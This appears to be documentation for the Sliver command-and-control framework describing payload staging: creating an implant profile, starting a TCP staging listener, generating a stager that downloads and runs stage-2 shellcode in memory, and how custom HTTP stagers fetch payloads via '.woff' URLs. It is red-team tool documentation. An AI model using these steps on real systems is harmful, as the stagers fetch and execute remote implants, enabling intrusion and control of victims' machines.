## Overview

As sliver payloads can be pretty big (around 7MB), you may sometime require the use of stagers to execute your implant on a target system.

Sliver supports the `meterpreter` staging protocol over TCP and HTTP(S). This protocol is pretty straight forward:

- read the size of the stage 2 payload on the wire (either the first 4 bytes for the TCP stager, or the value of the `Content-Length` header for HTTP stagers)
- download the stage 2
- allocate the size read in the first step, and write the stage in memory

For this to work, we need the following pieces:

- a staging server (the Sliver server)
- a stage 2 payload (usually a Sliver shellcode, but can be in other formats)
- stagers (generated by `msfvenom`, the Sliver `generate stager` command, or a custom one)

## Example

Sliver implements staging by reusing the profiles feature. Profiles are sorts of implant blueprints that define a configuration to be reused by the `generate-profile` command.
The following command creates a new profile that we will use for our staging listener:

```
sliver > new-profile --name win-shellcode --mtls 192.168.122.1 --skip-symbols --format shellcode

[*] Saved new profile win-shellcode

sliver > profiles 

Name           Platform       Command & Control              Debug  Format      Obfuscation   Limitations
====           ========       =================              =====  ======      ===========   ===========
win-shellcode  windows/amd64  [1] mtls://192.168.122.1:8888  false  SHELLCODE   strings only  
```

We can now create a staging listener and link it to the profile:

```
sliver > stage-listener --url tcp://192.168.122.1:1234 --profile win-shellcode

[*] No builds found for profile win-shellcode, generating a new one
[*] Job 1 (tcp) started
sliver > jobs

ID  Name  Protocol  Port  
==  ====  ========  ====  
1   TCP   tcp       1234  
2   mtls  tcp       8888  
```

Sliver staging listeners only accept `tcp://` and `http://` schemes for the `--url` flag. The format for this flag is `scheme://IP:PORT`. If no value is specified for `PORT`, an error will be thrown out.

We can now generate a stager using the `generate stager` command:

```
sliver > generate stager --lhost 192.168.122.1 --lport 1234 --save /tmp

[*] Sliver stager saved to: /tmp/CIRCULAR_BRA
```

By default, the staging protocol used is TCP. The `--protocol` flag can be used to specify either `tcp` or `http` as the staging protocol.
The generated shellcode can now be used on the target system to start a new Sliver session.

## Custom stagers

One thing to consider while writing or using a custom stager, especially for the HTTP protocol, is that the Sliver server will only serve stage 2 payloads on specifically defined URLs. Indeed, since the HTTP staging listener is reusing the regular HTTP listener, it follows the same [procedural HTTP protocol](https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2#procedural-http-c2).
The extension used to retrieve a stage 2 payload is `.woff`.

As a result, if you want to implement your own stager to fetch a stage 2 payload via HTTP, you need to query a URL that looks like this: `http://SLIVER-SERVER:STAGING-PORT/whatever.woff`.